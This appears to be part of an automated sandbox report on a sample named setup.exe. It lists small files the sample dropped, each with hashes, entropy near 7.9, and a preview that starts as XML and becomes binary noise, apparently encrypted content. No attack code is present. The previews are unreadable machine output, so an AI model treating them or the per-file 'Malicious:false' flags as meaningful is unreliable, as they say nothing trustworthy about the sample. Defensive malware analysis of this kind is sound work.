              Preview:<?xmlK..H}... ...n..z.....#..B.....e...g.9)...[n......s/...pEi2 .].x....Y....3...t.b...q.T..%..U....V..x4..{P....^.n.....B...P .r.m. ..4...>c3..T....PN..Y3qB<R:yC....r..:.c.\.Y..r<\,).]...Y.X..h..p...-a.....=f.EX....@...0tJ#.!..k$.q..l..L.,..)T..(q..7.h.y...7..B..#P..u.FCX.!.....\.SC..z..T'jw...;.....;.q+..#"FC[<F.X....^..'.0.|.Y........xYM.4.[.......K.6.L>l........I.`.dwf+H-~.........LON....eJ.^..|...@..s...W.$..q...l\*.b:..^7.T6k..h..v.x....hw#Y.v$s_.-!ftD........q.ucCI^.......N..G..M.0n)...>.... U..2...s.X.K...55Xx.0.x..#...G..CF........k.. ....}.4RkG..... NQ..s....~.Y..P[x....?p..).1%.@.._.....2.......;.<..Z.Rx...N..J0...j:.\..T..e.......R..v..`...................|...,.S#..j.u.i....8f.@h....vc.M.-.......]...h/5N.b.&.|G.l.........&...Z..=q..v.`.JS..j.......cA......_c....n.....R...}...X...mu.Y.9.m07.eQ'.K.0..8..W.i..&0..Q.@.<...m.b..L.C.&K.....-....M..C....[K.*F..I.....|..~h.6S....._.N5!.K....g....c.mW.%9.ye&C..F.#.?.)).......i.v;.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1724
              Entropy (8bit):7.883275986422855
              Encrypted:false
              SSDEEP:48:CQaIh1tzIhEUMEFWqjNM7WG87IL9aoZIkigZD:C/81tzIacljmCGPVIkJR
              MD5:C945FF584812A16CEBD8CD6F18F6089D
              SHA1:90808D73EA8272C492EBCEF1CCC012CFC305BE46
              SHA-256:45C63CF7846E6A59770A8046520990F9D2772D5C85504A96B442810E2CEF0B7F
              SHA-512:B32C444C825AED0E4264F7C457F6A3F7FBA1DEA52BCC9C81BB93461D6F14ACC7A44C12F4FE3F27CE1343CE46C41B290CAEE17454E6F830FC663E17A279E10D74
              Malicious:false
              Preview:<?xml......%...M.i.N......k0.`I.f...2.a.....`L.X.........a.(.1.d."U.....n..3.9.J..fM....W.Z`..<.mQ..N.c.M.H...O.mgr.....-.P.5;-B.Z..............F.........9.....-.&.G.M..xx`.Vz..........x]..*..1.P.g3`...N.C..KN...~h.t....b./........w...`.S.cZ..G....c}s&.UC..iG-~..Nb.J..S:.")D=(.a4K..S4..E...<.a.@.U....o.4..24H.>.*...N]I.ws.y.....z.h..Ou'......j5n(......I5.J...N..|.C.1...u....jWSO.1...6.....O.?.-..VS.Jy.H@...s.sH.l..-.. .......o..sU.\.<..&..5........]A{:.o.;.v..[.9<. 2.H...D..X......t.:....N.....y..zW{.|..!)@..&....Vv...&7.........`ds..;n.?.t...F.......`..FzK.P...\..Z.-)..#~....]6.|..|..T.. 3.........8._..i.X~.~.+.......s.}.v.}......W.....Z3.q.{..O.y...F.p...G.X..?....w...<.s.9P.A.sL...-%.........!.kV........GO?`T..o%...0.L.U..~P^B....<8o..#.!.F..........$.N....B..5..S.?..Zb.e.a......7.....z.RH..&E....(.Bp...\}......n..wA.[..)wA.l.._6`Q....j.KMXl..Lb..}....f.1...-.N.zg.].%O.&..~...O\.H.z/4%r..<E..;......%&....(R..gG6.l....=/...y`.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1701
              Entropy (8bit):7.887234203866792
              Encrypted:false
              SSDEEP:48:luI81y+0JuO4r/AwUb/nZr7m8ovvyLrfHSfrCD:l1PuOkAwS/fiv0fHKK
              MD5:8396AACC8E960908080DB13202A808AD
              SHA1:88E9AC43B9297790AE9ED796A586851B4939AC0D
              SHA-256:10EDCD40B37CF7DFA4F10238C30BC494748E4C1E2E351C77EE50F6DCC999877E
              SHA-512:64B6D03CDB4B9E215DA638457F233F095C813F17BB92D4D4E96D98EDC8E75BDE467EAAAE8AFF7BAC56160FF55DF0AC4CC9DABD3172A08149E34F05D8B4210319
              Malicious:false
              Preview:<?xml..{[.~&. ...}... W..9e.<M.-.H..Q .... N.3..V..o{%!..8.U;S.d.=Z.....~.ul..j...9. ..[.'<g)...yQ.92;.(..X...i........,...&|....A._.{v.........un6&. ..I.QQE5..n.).\c.:z=.P....7*(..,..n.m........f .....my.G..q...k..,.K..o..D.GT...~Zp......)g.|....^Q/...n.1.r...0.Q..P./..\V:?.\...1...........p2....o....Ik.-nr.Q..sK,.L....W.v.Y\O......+.>..v.U..L..=.. ?...g...q...)u..M.(....o...q...L...5%..d2.....[@.....ksD.m.cnM..........l.F!..).9q.n.!..y .4..%......:....C1.J.Mi!....i}...ul.2r.f5e.?3..@.g.i...eCV.w.].a...$.].r.V......w..F$=.. .e.1.)..)..[_P..3u...qF...<.F.|.................1....vDd.mQ.;.S....N.d....S3.%y(].:..}fA..m.......}...7.-..r.M...Kg....A.....,fF..\..8..<....2.J..>}.A=........2S.U...(K.%..5[...'$.....4.I...4..;./.]>../.jm+....].C..Q0D..c...=.b\1..S..J7/.H.3d..!9K..j.y.)..b.^....O..;...U"....YT..O....l3,(.>Ih,...`.g..wf6.SCz.....'..8.r.......g.4.......TM.......)tr...q....\PM}s.>..:.Sn.y:hN.s.I..K.B..q..N...6J*...b...h8|~.U~..a
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1738
              Entropy (8bit):7.882296635312027
              Encrypted:false
              SSDEEP:24:H6E28GFOZPXvoQysS7aAYYMKQ5TzG+Z3PVNpML7hhmpABHDBbM6ghqUqlxv4pbD:HF29IZ53qon2+PVNeLvdw5qzoD
              MD5:4342A58AC92B65F3FA0DAA7C6BDB19CA
              SHA1:8BD9574E67A933607F2AB73D99447D4804AC1B56
              SHA-256:FA845CDDFD0792C43BF38BAFAB352388860EF5AC47CFAA6D1E7C8D65720D7F50
              SHA-512:56EF9E1DBBB1127CD00D7539B9DF494D886A4BCABFDF5F03E15EAC2284EBB52B2330E355FAAE76F677FE91E9E5920E14647323F3B69E7EE38C78839F38A4B273
              Malicious:false
              Preview:<?xml....c>.1.........8,.....q..6x.J......O.Ov.....[=...+....?.o6.[V...k.....`TV+-Y....:5Y....%.....V...1...:T.....N9.j%.m..~@.X,|S..C.C;..../6\..A.3/.._......S1h0.-v.s......w"..;Q...UM_IT.<.|lE.....u^.4r.4.....j.._.f.PU...2...w.{.]Fn.T.9gbQ.B..V1K.a.._...j.....3p.U.3..@H.."A..|..Z.R....|...B.z.....d.?.[....}f/l.....+.uy|pu<..k.C~~..Q{./..x........./..|.M......e.B..a.?.=.nIp.....ec...]P...:ci..g:H..+>..uQ.....|hQ..F...4..%.H......f.v.W.3.......$.S...Z.%..f4.....q.<..P...'8..v..]b.oq..<.. ...#..&jl.."..L._;..zcY.j..%......Ss.q....5V.O......v...2c.&..]..O."....O.M..,.i.0s....F......"...jK[d.......o.e{]jqF..A.C8.C......{.t..c..U-..G}.X..k.P.W..d...x^....b%.......j...xO.0...K($...K.K...R.1.n..Dn@DT..*0W.eN......?L.c0r5Z>.}..........mX.x./%.e.N.x...T..>.....o.f.....o...v.|...'}..V.?....b......=+<:......E.0E7.`_.Z.!.k.y.S\..l8...49..w3-.=!.zLdZ....Bk\.........V%x..O..'....M.98....x.:.....+.>...f.'s...F..,..f'.~./.!..[+....x.......B..&...]N$
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1707
              Entropy (8bit):7.896521540260242
              Encrypted:false
              SSDEEP:48:+533IL+de0Jf1unsBDPqVbIU1rIIx3LqBD:m33IL+XDPqV0U1EIx3q
              MD5:B9070D316E8E8FFB794855A3EDD42BB1
              SHA1:A7917A631F64E65D24F8DD2D0F9EFE7F1285D375
              SHA-256:B6032467199BF5DE2B0BEF7522D460801C77A4AA8CA5A8DE2F4A77681A30C88E
              SHA-512:C7231D12EDE27BE0BFCB983ECC2C0219896D21BA83E275F28F3C4FEFE50737E04B19851F7DC9E1BA1FEFFD848D0904FA4991D5D5C93455631593C7B8EDCD6C4E
              Malicious:false
              Preview:<?xml^F;}...<).m.y..x...w.&%'.]....C7..v...FP....R."M %..G...d?Z.wh..0.j..w..<.2n|5Q.5..{.........#[$..j&..I.E.DN.. ..'.fro.....P...u.1.A.-n....c..J....2.;.g.....L..m.1.BD^dwv...NP2h........N.t....l..p...B....Llk...4...g.........&.#1.......HU..$.....V....}H.i....a@...c.:...I......87..gU./.....P]..,..*.M.$&.y...>.^..;..@1...e0H5P..2..'n ...g.......D4.p.c.j.?...M....Fb*%.l.....}~....u:D.J.9. "z...,v....i2.b..u..,u....F...O.g.O.P.."a.~...]....8.Hrj..*g.*.....6BK...+.e...#.&.y......)..t>.|...,.~.....p.z../REXq..6#......j.C.&......z.y.x.n./|hT..:W..P.....LB.3.7c...4)...5..^.}s5 5?W..._.'.[US.........V#$...-.i...+2...].0....3.zl.].E...|...}.....G.NM.8. ...lB.Z|lQq...t.....B.,.....-.t...%...K...G.WoX.b!b..w...6.X.1..3."...a+...w...5......&1.....c,r...jUK.~X.#!........<CX.!..<.O..+.>I...F.u\.U..u.....`5.....!3)..IAF.H.B.A3L.o....\....r...j.c....D...0....Qd......+..sR...C..M..}.l..Ks.1..."X.OB.br.Me.57..Dt..&O....J..zQAU.*...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1744
              Entropy (8bit):7.881342591664745
              Encrypted:false
              SSDEEP:48:SpyzU35v2Kz8YHVX/UnvgBg+ndPaXX9pIsyngD:SoUp3zlHZco5dPanXIO
              MD5:D60767FCED7C0F27B1975FB1E9013BBE
              SHA1:6ADDDC29066E82EED84B3C0CAF9A1693104BB097
              SHA-256:C4528F340E9F6DB5ECF2EACB1A70B9B2D038C6E94518211F0BC06CAD4EB25212
              SHA-512:C1A0A29200DB76C75D94ECB5FFFEB1A71B3D35A2E41DE4989BEC293AFA2426B9140C42C40C019342949F71630C34C991A66A1FF88B4E1A9A3E7C19DCAF62B9E8
              Malicious:false
              Preview:<?xml[n9{.,<m....N4...U{.A.&gU.......!e{.$.2Y...o....x/.b...O.=...J.".E.g.o...l4[...03@b..+.N.9?.s.Nm.+..}.4.....|7....N.V....e.G...)..W0\.....\...;L....z.b.YE........*ha..j....'r..;.@..;.d.t......$.!....f.n{...j..M.....|.....#*..j<,..%.o_...b.c..~GCI..nf..S._;...]\.+)2vu.k.....J....6o..k..4....dk..uRT..h..`.H:...T"S...R.*.w......*f..\...a..j.._.3....R...Mp`.c.....E?KTu..@.I!......*..v.M`p.+.c....#D...6..$:8.).....^...+3......?.m|<aN..L6..xE.0...u.!..T.r.X.L...k.d...........Y./.j.J....,%hz...J.@%}v.86.x`....}{t&"u..aC.......-Z.".~8.E%c6].v...K.1JCo8.G....6yV....{ua.%.7..x..n3.......{.a._.....x...{.6..n3.=...[.=S....!i.J#&..)t...x.../..r....P.$..{p<.q.. ...M*..l3.n..NK...O..SPB}.NW.....R...1..*Jw q|\&...*..+CN....x..y.=..._4)..n.*....)....#.../..p.....Th.Y.QqL..X..KB.L.....Y.W...i.a5.H.....6QV2..>XJ!v...7.Ui.&.b.....z........t.O......[.)@.n.....)..\..*.u...UI{|.N..0.........!O<.!.y.h9..^.....G.8.;.|U.......Y2..?....z..7........0.....j
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1701
              Entropy (8bit):7.880863443202012
              Encrypted:false
              SSDEEP:24:AnVgH5iREqLoJ5eXAafMMMm2SnJI6OyQP5gPqHcSF6zcl/2bD:AnCBLeXHfumJIrzeP1Y/kD
              MD5:C7D3045D63140BCF59D516A6FF7B0BC4
              SHA1:D7737D1FC249A72B4BC8415E208CC072D8E8CEB6
              SHA-256:4A13B85C5B6A285ADEE79CC9872EEEAFD52C4B1B46C2B83D700CCE95A6D3D4C1
              SHA-512:793A2C1633009628D86B785747672C5DDF6ED05531F8FE36F17F94D5B1761AB6D563AA083723F230D8453F6696F99235357E5A43D8072E673BF03B52F683D336
              Malicious:false
              Preview:<?xml=....T........k'....?......-.......f.v.H.D.1(+a-c.L..b...1x..+.c.|,7..<7...V.!.aQZ.7.H.+cE=..{....$Q4......,...[..X>...".F....e/....!..Z..7.U.?.G..o..X.J..21..b.nf......?..1.....N....X)c.../...7...`..}..$.T.=..G......'^.=.!q....2|..(H ..W.{.%...r.]..+./.F...Zha.5&..9.._.{3T.2.v.v..l...R..t./R.3.f>[5;.CA$.......)..7.].H,6.(C..OT....d.oS ...kC1....W.jf.[....t"...y..21f.y.0O.d...|..aN..n.%v5"uh./Q......z.<..d.....Ono.v...&..... J.6.]}I..B.'..M...{......8.@+N.A.2...yUJ......!.d~...Jx.....p....I2... `.3....=e....E..f..y.p.....i..<....g.a......~{...E'j..+.6.8...{.|.C.]5.c~<..#.$..<.......mj............]~......I.._*..#p...,N.6...j.~....E..CleY.........^+......t.=.L..r...1.......U2....Z=......!#...#.%.,=T-..^...Q.0......@...`V...J...._WS.f&..-.c.2..W....e...E._!V..\......;.5..4....,4..2....z../.9..%....7ku.H...%7..)...:..v.-..Ho..{.....P..m..R.|.-..$.M..Z.6W\l5.`.....y..g.j.Kh...@x>....G.m.}.xA.m....".........2..K.t.nk...a..G.^Rn.7.{^..$}2Q.....G.c'
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1738
              Entropy (8bit):7.8646185883892405
              Encrypted:false
              SSDEEP:48:Jq1fOe2znxtD1eo+4uefgZgVIG5YuPqSbIoZTMfD:JJ9tDjuefbyk5zU
              MD5:93E267F3AAC37BD44E61F4657026BBAC
              SHA1:579F2B057766271318B38BFFAD1361E998743401
              SHA-256:349492297472D700412B24E38FF45955A9AFD69F6EC422B624297CFBCC1986ED
              SHA-512:68484E98D938D9EDC0F6010706B9255254183BECBF0791D5BC406FFEC198269CEBBBF87F85713D46CBE09B48342E9B197ABB505106E992E170AD1F60874E8087
              Malicious:false
              Preview:<?xml[.)+....[...r.9...p..Dp.<....y..4BVO.;7R...,IYw......#...4X..ZWWc....n3...I...22@\..7./.4.b.RQ.7*...$L.K..!\....p..'..?..J...k..Du...#.....IuZ!...?..1.k.3.9...h..~...r.l3......Jqd8*.9!....H.o.#.....w....4..^....,...........{.........G.Y2.P.F.....^...sJ..{.w.... A9..3.........Qg`....2.M..x.a$..o.N.....c.._hD.:|..U....hp..L.....L3..q...Y|m.w..o...p..T..8.n../...(......iqS.i.*..2..1.QN...(..P'......f"..,.%w.".p5.!...9..Gzl.L.".....C....)t:....9..!q...D.g....3.jc.....98..Z.....N....n.)!`..9....|.F....{...........AZ...'G2Y>=..^..S......Ic..y.2.h.E..o/2......y.4...l.9*...r}.[>._g7..1.`P.g..s......h"..q.s.!.!Q.'...e.(....`/.s..!.'2.A.._.Pb..f...q!3M.1.].A..P.M1.C.0|..L......^..l...Z/. ......Y,.............vDN..-...i.`:.r..1......b4.;'.$g....j5.. ..g.). .s...}.|...Ng.\1..E.?.J.[.:.$.?...Rm./[..'.N....x.....@.;@.qb..et+#..~.LF.....J...0.Lt'..=A3..7.l..l.6=<.E..]..V.1.....vK...V..4g..k.z(.G.u....\..Bo%../>.98.6.t.k*S.....].Qy...n..+.^..y..$...u..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1702
              Entropy (8bit):7.8756776445774275
              Encrypted:false
              SSDEEP:48:gqZlVnvvTNRKYA71VAvHGdP2eQmtL/B45D:VlVnXTrKYAJuHC2qj0
              MD5:8EDF5C685082CA018BA56230F781FB49
              SHA1:77A2A031D2317165CDADBAA1850DE9D3478B7F40
              SHA-256:A43D27FD79B0B9499917F0A128C6E315AC3DCD37DC13100335945DCC3B7DC91F
              SHA-512:FF352F99412A52AAED952ACC784CFEC8AF35ECE22A44CD6555177F46732608EA72BF7186EDC2889D39E9D76798FD1C420B184A5211123053F405DC644308E567
              Malicious:false
              Preview:<?xml'..........w..4.I..W6a.<..TF..8....~....^F....f..R.n..QK...>....^/.........2...2...Q......z..Yd`...hz.Z(yz..(C<.r..~...>@a.bON.w.N.o....t.H....>G....Nm.B_..L.)...\..u..D`..o|x..4I.*...?L.<p.6..)........{.,$d:.....W..H....`..nS..$!.z'..:.t....$....2....K...HR.,\.....w.8....d..z=.._.<.6..,.y..9....&..x...,`......;,C..E...O6..$.P.p-.a..\..Y..T....t@.....cmd.......G.K.;.n......`_{....A.....j..e..,..].SZZB..t...H....v.$H`4..Qn..6.6l....NH.....m.4.G..T.x..U.y.6...S!..&[..G...... ......B.B. +.....a......S...6P.p\...Kc...^..;.Vj..6~I.^..W..W.....+.Fr..v...8..$(.5...8.[.*......@C-.M.U.@dJD....`..S......1g..I...j.. ....{z.WJ..Y..#.^'tI.V$.*.2....B`8.f4.,.H%.N..........z ...k.fx.B;..T.......6'.3...V(..6)o..".....+u`...q... .:...I....O@S*.?..W_....<j..u.@.E....I.....k.Oh.8SS*X.A.....f...n.I.=....>.P..b.Z....a`...\\I3..VI....Y..@?.>..p....Dsx....#......d8...w,.{7_.#0...=.....|..V'.xH ..J{... ....jT.Z.+X..k...A\.Y......\......cT..w.........X
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1739
              Entropy (8bit):7.905719197816473
              Encrypted:false
              SSDEEP:48:mctKjUfmy+vauNidLJJaMEV5CyfXbWkm4L7xIVOXU6BJD:mTYmycau0dV7s5CyfakHnx/R
              MD5:2F2B633EB0EAA8EA71AACCE24571526D
              SHA1:A8C4BE6007A74B70F9C0C28925EEDF814F4DAEB8
              SHA-256:1796BEB93BE1FBAA400C937A3015F42F89CF17B0A54A7CBFCC87D75C9616C6C5
              SHA-512:B57AAF39BDE83F210BBEE344B870FAC7EBA2DD329A3731F4F979D7DA99E2CD973EA0CE779D829525CAE3225BB54401713211119C13AD970266D626120756A0F6
              Malicious:false
              Preview:<?xml.*...V......<<..,^.L....,..B...P.%.}......)iK....d.a.t...Av....'.H.M.d`..p..!!..q.i;..t.....^.h.}...3..ZI.{bmLy*..n.|.......u...`....EN..3.o.}..)MP.!pt.1L'..B.....r..Q.._..f.............a.!D..em.........#.|..i.^.HL`.*O.../.c\.f.......L....U..h./.;.W.h.+].f..t.......b.S*....Ak.Au...au.....BkS..1:.|.MTn..H.N.>.Z..6 ..P.$... 9{C5z...y.m,.#.;.R....s........3].-.>ZQE. R..v.\.L. J.E..f^.t.4.i...K.l.z.........3......... .u'g../...[.P.V...c.I]..g [.8........e..).(.".m......T..}...~.l....C{.j...r...8...m.....d)..^+_.S......Y..A....9K!..E..&.U.....T...0RdC.. ...b.p)..<..P......(..^...........gv.Yn..N.J...y...T.cN.*.sG...c...!c.Qd....*...6HZ...S]Na.m..{I.s.q~.B...J...kH...A ..s..........d..s......N..x.j...F...`...S-....c`..j...'.0..[.#.Q..e..$...J)..j.e.S...~[..-.%..e..\UZ. .YJR9.%j..cMZ.X}'X.PM..SQ.U.Z.0b.."."`\.....7.a].&Z.....?4...8.z..A.D.2../.l.'.&E....mN.e....f..U.T.n:&7....h<.4.O..n.K...(......C...S!X...n5..S.r....gg.a/H....|./.G=.,!
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1724
              Entropy (8bit):7.876233984923268
              Encrypted:false
              SSDEEP:48:9cTuUEc063RrKyb60FvcI+OCzESTgsSOi9WD:9c6UN3BKyb60FkJxfFSOGO
              MD5:88E2F2624AB6DB75F500105EFCE93203
              SHA1:5002CAA0CE205278734C138DC184BB3755C38E8A
              SHA-256:EBA7F0F8D898C339C892BE31B90470BB5BEBA70B50A9BC7D5FD5EF38A060976B
              SHA-512:316762A2BABE9F8FBF0216F2C37C23C28246BC3FA58A964773263C6788EBAEA9DEFDEE6F609FBC11474D9A13D48C73BEC9AE180EAE407EFA9B563E26505ACF92
              Malicious:false
              Preview:<?xml*.3.[4x*..]&qL.zl....'.L.)...pa?>.X.6...SX.&.<.h.A....ib.+.......n...$.....t.kt.O..?.u.Jcc..."{.....M$|Z_.d..jKe..R=...........A.........&.gH.(f....v`9.....v.A........y.t..2.O.fqjI..~..v..lWL....?.E(.."3.<.n.....#.T...]..m...-oR.....e.h.v..T.b.K.)R.#.N.;}{.(...)..C..!.u..Hn..k0..E..P....{2o.r.....N_..D.9....m....F...)=..yx...H...h]..V.......3..C9t"....k.a...F.N..ZXh..E.`xK.w{...CG}...../...)x.T....'.T|.....z...1...,.+.htl........w.......X.0j.K.82.).I..c...o..+...I7..D..{...k9.=0.E...Ss.v...p...Y&...]../.6......%....q".=...t!$Z....5..vm~.P....................n!m...<|....W\.i+.YNV.......s.....q.rA..i...%..?_.<`...o.....8H.).P.....y.g..<|.k.L...:....5(......:?....*..d.....q.{.V....v....Q..I.+H/sDe)...W......h..P.bd6.G../..}>B......t.y1M.|+..6..+.h3....."....w@.j.....#.+....$>yO.n...P.....!...+.D.^.S.I....O.)..... !..Y.....R.32..c3.......k1...ft..).. Gu..}tP.&j6IZV.....b..O....o.uO....O.._.....s.*..JAm....8....6..BU
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1761
              Entropy (8bit):7.8833824197571465
              Encrypted:false
              SSDEEP:24:iiJIS8ZRfeuAOaa5yXr2rKXj9HJTyO+eEGe3RbC9JYw6USKKvv4h8+kigl45HvKX:iIz8ZJ2OaIeKKXFlyOXzgZdQh8IgeCD
              MD5:61428C23193F65DB657BDE75AF584A26
              SHA1:D169A4153B0EFC815F23A5E76625AD70E7C6B7A0
              SHA-256:775B7D192ED7B25002A1798D319698F3D64247686E3F8C4A253C3BAE2666740A
              SHA-512:B0F6D1B7AF4C34564325C54A1255806A80A9127121F8513306E26273F4C9C7AD374E2E01071B5F0CF6E749EDC7493D04AC748431F132F93DC48BA950B5ABAA96
              Malicious:false
              Preview:<?xml$..+..^..W.Si.z?....cP.w.......#.'.r......u.......,...NA.....%. <:.=....c....#..ZW.}.5B..f..".y.N...c.1_...AKo.h..z.H..)....*..!K....B?..5@..D..y.z.U.x..%.i9...Z..r.".b".........k..E>.....~f}p@....P..........~&.....,...2....Mr.\.......I!z.+u.y7.*nFE[..|v.%....Y.F......|OP.4..A..Xq.Q....J.5...).+.jcw.Q.<6.....C..4.~F|4:..])/..{c.....K2.D.~L.hT.u...[F.ed..l.JEe-L.............|R...7d>?.gp.%G...S..}.9....N_......B.3(..4..V)..QS..6......vz.p.I.l. .{..m..gV.7....{a.,..../s.o..z&c...M?J.N....?NX..K...S...m /k.P<$..^.|.j.n..c..KW..7.l........+.@H.H.s..P........k..OD...v.3......k?...n........p....W\_4........r.E..O/U..{..z..D'.....{...5......aV.-.B..1..]w....k..f.8q).auv.^.{....9_c..]....<...-.. .Rk.H.}.d2/..X..<@.k...#-...l.....N.....<P.j..Ow.K..AO...n.P..AM'Dm..........:..O..-!$..Uw..:.@.l<.Qw....Q7.n].yz...<\rT'..pR.k.r.>..'..\..`,...a.(..6.p..zg..G.)..J.M.....-...}j..wG......mj.....@..c..(;...h..f.#O1B..RC.th... 8...-}<....M..OH......zP...(c..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1689
              Entropy (8bit):7.895791293607246
              Encrypted:false
              SSDEEP:48:85nojGxKoZqUZ64RnfV7nRZpHawlGYcyyDCCD:CnojGxKfUVpV7nIwjcyrK
              MD5:4E462D5F1A15B6E43BD3BC4D90A2FA31
              SHA1:F9D47ED4ADDB5FBDCB72648237B2F82C2E2932C5
              SHA-256:B94F3375C2B44860CDA3FA1344F1592070A2AF99FDF672705E5565DC670C018C
              SHA-512:2685AD107C4C6A6BFCC7D514930A832B7FFA156B46929CC44B9421B9B504246F6EB4AB181AD52441803DCEE14D792B4246521283EFC4B37E5A48D9CEC97DF938
              Malicious:false
              Preview:<?xml..E.1*S...~...z3m4_../;...?.D.@I..q.Q..P&.x......'....Mk.-D....l.K_..R.:.c.N......h..*...~u'..........4L....|.-.l..rP.y5{.....e..Y....OZ.c..}.+.O:..N.,.,.G..b|.?_6..Q..}$.R.!.Z...@..~..X.Q.@.OX...%Z.r.|...oXO/v..Q.:=EE.M...s..6..>m...G-_.,v...(....4...oZr..ep.E!.....@....E....*..Q[U)....Q..~w.$...G.".b...2..;G.....s.D.!....[._g8.q.k...Q....=...t.P...*.'7.^....3.9=..Qx....V.:Y.{......ZV.....t.....y.Z.).#2)....:..h=.S$...C._u..a..Z!.2. >G.c.5...g).D>.yM...f..M.1).zN.....7(.L.T].-rU....D..e.\....qE...gC.V(..:.80..Z...~.~l.8.G..U.../?].f.....@...$..b..X .-.m.9=.sb.~.p.9Me....O%...P..FT.k...r..t3.... }...n...&0....e....1...]u...;..pP.Oq......|..7.)..L.OP..:..dL..4n.}..S.....)....d.8.J.-;R..........{g^..Nv..I...9..ww..2...... ....I.)P 4........c....#..t.X.y.%.Q.`.KD.J....7...CA....Y...K,.<.....9...o.o...=%7{.eQ.<;....x.O,..o....gw..x&.2.0.......<u.....1.].[G....B-ud/S.....C.rM..0..h...:.mW.z.f......p.0]G.!..R.R/.3...q...\+..;}.6....`#I
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1726
              Entropy (8bit):7.881519430576535
              Encrypted:false
              SSDEEP:24:Sf8WI/e99pKxaLCYL2KHL5GPUeK7QlC8WSWBKThnGxzWUlOIyP6kU3nt32HTKYbD:refpSQnL2KH17QlC8WSWBKgD0j43tkD
              MD5:1EAD1A3C7A429BF36BC6EF93ACB409BD
              SHA1:7031F3D18887E3433638A6458F7AC6B4BC78FD66
              SHA-256:BB930644EAB8861994C3DEED28FF6EA7FA8D198EA32A83FAF8EC9D9F655AD21E
              SHA-512:6737E609F10BBE1A73E3E709AD019FD3BBD00A20F041B07C9520CA52782352299742405FD91FA1D48B3924BB8AB201BD321B7A5070F8EA8008A61FFB055C8F6F
              Malicious:false
              Preview:<?xml95.....#..QxI.k..L+..zA[.....Y.#?.l....5.&.:...D..%@).W..../U.9....0M......<.....?m.quX.xN.tRiE#...bD...T \?l.gdR.H.\S.X]..@X.....x...~6..:........0..Bk}5...z..?..3...q.>z.a..4...EL**.C...OG.x[..F.m..c...9M..<.._.......(.S..W..$...:..e\.EH.N....).....w`....b.X.9.I..P.@.J.Hl$..f./..Vi....'.t....'.....l.i..~..\m&#.R8.u.5.v.@...7..#...1..<.ww.Al0j....k.6.H..d.M....`i..x..g...94....#.r}..0...f.x.z.-h.Br(. o.d<^..C.4@w.......Jk....J.4..//B# ..j.....b.'..<..p...|.....p.u..u.*.OP.......p....b.....d.`.)).eNBd\.~K...<wA.......(...aG..)R....Ti..fIIp......j(j0....T..*.u..>.On.|d.K....5..........Y.8....8NKE;..[.....E.9...`...o..C.d..7.L.T....|.J..?.r.H...gg;.=..I.]..c...&@.......w.+:.....L...~....G.cm .[...........^...>Q....u.b..'....~.......9Ro.$.vf0..6.M.!...J.zp..:UXR....~.V.e...Q...NTh.q|..%&.A.s!...J.".d..8.iw.........vf.gC:...'.br..C...%g..s....@...1=9,.]=|.:.^..............<...Db.4_..F./....@....=...W.>i,po.+B&PMH7.$.t.._.n...l....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1707
              Entropy (8bit):7.884138639761011
              Encrypted:false
              SSDEEP:48:sBSW3C5ThsKkuQeqWvT7cwJvkR29VL4XEsZnD:EC5Tnkuvr7cwJMR295Jsh
              MD5:38AA75953D6943095DC9CABC535F3183
              SHA1:4F2FAD10CB4638AA29A961BFFAC16D2B93A34090
              SHA-256:B53B7469D12BF65077604FC911B4D9405D0FCE97AA89253C54B5144D869E61A5
              SHA-512:C7FB4C8CB1914AFF4238B716C2B8A9DABD48C2A25765A059256CA59B69168108A6589D435894174BC8A49A96F1080AF329C96FC44D1685872662228B16865FEB
              Malicious:false
              Preview:<?xml.D....?..)}..K.s.Q20%.k*...Ql.:}A...K:$"...|r...{s..@.].Ao#...b.`..(..#.n..._...s..`.+..u4.d..N.&m/Oy.m.....eo...Md.]...B...5...;K...n.x..V.=h.......R{..K....*{:/.Y..w.:'P>...)h.j......]%K.#..{..v3G.N...m.6....&.@..G.f...S.G..&A..!|...A.i]...Z.0.8:FC...|si......I^:8......D...+$.c.....x....[-..f.0...............x@9...^..?.K....D.Nk.<.......;she.7.D;,..z4.{]!..2...u6.F.2*..j..2om/...NRti.......Q9w......T..........T.hZX&@.......`U.8.....t...GK`..]>.....t..`R...\.].&:..n!#.8tZ7...7...&G..i...]..v....\rhS... .)F.....s.e....0.T....;i<..y..dj.....,x.;m.,..7{...^...Y.!.d...c}.M.w.0..,U>..@..QE482...;..-..:=w....].)..?gE.7...#.Rc..J....3\<yQ(.&C.|Kn0PU.d....=*..I....j.....^U_..v.1N.....U&.V0..pYh./..W..s_C......P...^...a..O..Hi...|t..s.a..E....)....yIb.73........b.....i.. Z.......188....n..A.*U.(..;.I...Z_..-.U".hz.K.rp..........0.1...VV....$....y..T.\..I[....Q6."...'/..,.....Mx]...(...*+.=..1*.N..0...Z..jgf@.../...K....X.b.c.[.+z
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1744
              Entropy (8bit):7.887279890534646
              Encrypted:false
              SSDEEP:48:Y1Jzt03ekdPI8OHCg4GaTc+mGpToDYsqmb8HCyAzyD:Y1JW3ek93OHCJAapT4Yslb8HTJ
              MD5:FC73BDA2CF7A485D1CC7DB7091FF9A67
              SHA1:4524BE828BB3A474015423F879B69099E8837C76
              SHA-256:89B0081DBA772F2EE9A48B8AB71D318C0C5E2F4FF12D8ED1B02F5D06A60BCF57
